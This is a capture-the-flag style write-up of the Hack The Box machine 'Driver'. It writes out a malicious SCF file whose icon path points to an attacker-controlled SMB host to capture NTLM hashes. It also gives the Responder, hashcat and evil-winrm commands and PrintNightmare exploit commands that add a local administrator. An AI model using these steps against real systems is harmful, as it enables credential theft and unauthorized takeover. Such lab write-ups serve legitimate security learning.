Prelude

Driver is an easy machine from Hack The Box, developed by MrR3boot. This was an easy, but cool box which demonstrated the recent Print Nightmare vulnerability.

The initial foothold part was also a pretty cool vector and it taught me how to misuse SCF files to dump NTLM hashes.

Let's start the enumeration.

Exploitation

Nmap returned the following results.

Nmap scan report for 10.10.11.106 Host is up (0.048s latency). Not shown: 65531 filtered ports PORT     STATE SERVICE      VERSION 80/tcp   open  http         Microsoft IIS httpd 10.0 | http-auth:  | HTTP/1.1 401 Unauthorized\x0D |_  Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods:  |_  Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp  open  msrpc        Microsoft Windows RPC 445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 5985 is open. So, PS-Remoting is possible.

I navigated to http://10.10.11.106/ and found an HTTP basic authentication prompt.

I used admin:admin and I got logged in!

It was a website, where the user can upload firmware files for different printers. The site said that once we upload the file, someone will manually review and test the firmware.

fw_up.php page to upload the firmware

I have tried different payloads like exe file, msi file etc. But, nothing worked.

Upon further research, I've found a way to force NTLM authentication in using different files. I have referenced articles from ired.team, bleepingcomputer and pentestlab about how to use SCF (Shell Command Files) to force NTLM authentication.

SCF files are a different variant of shortcuts and it supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The "Show Desktop" shortcut we all use on a daily basis is an SCF file.

An SCF file can be used to access a specific UNC path which allows an attacker to dump the NTLM credential of the victim, if he browses the folder with the malicious SCF file in it .
When the victim browses the folder with the malicious SCF file in it, a connection will be automatically established from his system to the UNC path that is described as the icon path in the SCF file. Windows will then try to authenticate to that SMB share with the username and the password of the user and Responder will capture the NTLMv2 hash of the victim.

I created the malicious SCF file with the following contents.

[Shell] Command=2 IconFile=\\10.10.14.86\nc.ico [Taskbar] Command=ToggleDesktop

Then I uploaded the SCF file to the firmware upload page fw_up.php and started Responder with the following command and I got the NTLM hash of the user tony.

sudo responder -I tun0
Best Race Course GIFs | Gfycat
Sweet!

I then used a supercool hash identification script called NTH (Name-That-Hash) to find the hashtype and the hashcat/jtr mode number.
Name-That-Hash Can be cloned from here or it can be installed in Kali linux using the command sudo apt install name-that-hash

We can pass hashes explicitly via the -t flag or we can use the -f flag to pass a file containing hashes to Name-That-Hash.
Syntax:
nth -t <HASH>
OR
nth -f <FILE-LOCATION>

Then I used hashcat to crack the NTLM hash.

hashcat -m 5600 tony.hash /usr/share/wordlists/rockyou.txt

The hash got cracked and the password for the user tony was liltony.

I then used evil-winrm to login as tony, since port 5985 is open.

evil-winrm  -u tony -p 'liltony' -i 10.10.11.106

And I got in as tony!

Privilege Escalation

By the nuances I've seen in this machine by far, it was obvious that this machine is vulnerable to the recent Print Nightmare vulnerability.

CVE-2021-1675 / Print Nightmare is a vulnerability in the Print Spooler service, affecting all Windows versions alike. This vulnerability allows anyone with valid credentials in a Windows machine to add a new printer and load drivers for it.

There are more than one way to exploit this vulnerability and you can read more about them from 0xdf's blog.

I used the Powershell script hosted in this github repo, mentioned in 0xdf's blog.

I used evil-winrm's upload feature to upload the script.
After that, I used the following commands to load and execute the script.

Import-Module .\pn.ps1 Invoke-Nightmare -NewUser "secnigma" -NewPassword "secret123"

Once this was executed, the script created a new user named secnigma with the given password as a Local Administrator!

After that, I logged into the machine using Evil-Winrm using secnigma's creds and I was root!

Big grin gif 5 » GIF Download
w00t!

Postlude

And that was Driver!

A fun, easy box with a cool privesc exploitation and an even cooler initial foothold vector.

Kudos to MrR3boot for this learning experience!

Peace out! ✌

 This free site is ad-supported. Learn more